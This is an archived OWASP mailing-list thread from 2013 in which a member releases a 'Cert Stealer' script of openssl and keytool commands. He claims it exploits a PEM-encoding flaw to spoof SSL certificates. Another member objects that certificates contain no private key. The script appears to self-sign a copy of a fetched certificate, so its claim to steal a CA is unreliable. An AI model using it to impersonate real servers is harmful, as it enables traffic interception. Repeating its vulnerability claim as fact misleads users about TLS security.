[Owasp-leaders] Cert Stealer Released

Gregory Disney gregory.disney at owasp.org
Thu Dec 26 19:38:23 UTC 2013


openssl s_client -showcerts -connect $host:$port > $keyring.pem;
openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
keytool -keystore $ks --importcert --alias $keyring.pem -file 
$keyring.pem -storepass $passwd -noprompt;
keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks -storepass 
$passwd -noprompt
keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key 
-destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 
-storepass $passwd -noprompt
openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
echo "Stealing CA"
cat $keyring.key >> $keyring.pem
openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt -signkey 
$keyring.key -CA $keyring.key -CAcreateserial

This is how I exactly do it, they are checking for public key and 
private key, I'm not sure why openssl let's you resign as a key. But 
here is the source for the exploit.

On 12/26/13, 11:35 AM, Abbas Naderi wrote:
> I didn’t quite understand. What does the encoding vulnerability 
> expose? SSL certs are public-keys plus a bunch of other data. There is 
> no private key inside to extract and resign another certificate with.
> -A
> On Dec 26, 2013, at 2:32 PM, Gregory Disney <gregory.disney at owasp.org 
> <mailto:gregory.disney at owasp.org>> wrote:
>
>> I think a fair description would be it simplifies spoofing certs. 
>> This started out as a proof of concept a year ago when I realized 
>> there was a vulnerability in PEM encoding of SSL certs, So I 
>> chain-loaded a java key store which was converted to key, then 
>> resigned the cert with the chain-loaded key, thus keeping the context 
>> of the original certificate with a hijacked authority.
>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
>>> Well a description of what this does would be a good idea to start 
>>> with…
>>> -A
>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney 
>>> <gregory.disney at owasp.org <mailto:gregory.disney at owasp.org>> wrote:
>>>
>>>> I'm working on the documentation it works via  turning a a keytool 
>>>> pk12 to openssl key, then embedding the key on the root ca and 
>>>> resigning with the embedded key.
>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
>>>>>
>>>>> Hi Gregory, where can I find the details of how this works?
>>>>>
>>>>> Thx
>>>>>
>>>>> Dinis
>>>>>
>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org 
>>>>> <mailto:gregory.disney at owasp.org>> wrote:
>>>>>
>>>>>     Screen shot of successfully spoofed certs:
>>>>>     http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
>>>>>     Each of these cert's have been tested and capable of creating
>>>>>     SSL sessions.
>>>>>     Cert Stealer:
>>>>>     https://gist.github.com/gdisneyleugers/8129304
>>>>>     -Greg
>>>>>     _______________________________________________
>>>>>     OWASP-Leaders mailing list
>>>>>     OWASP-Leaders at lists.owasp.org
>>>>>     <mailto:OWASP-Leaders at lists.owasp.org>
>>>>>     https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>>>
>>>>
>>>> _______________________________________________
>>>> OWASP-Leaders mailing list
>>>> OWASP-Leaders at lists.owasp.org <mailto:OWASP-Leaders at lists.owasp.org>
>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>
>>
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-leaders/attachments/20131226/dee1dd34/attachment-0001.html>


More information about the OWASP-Leaders mailing list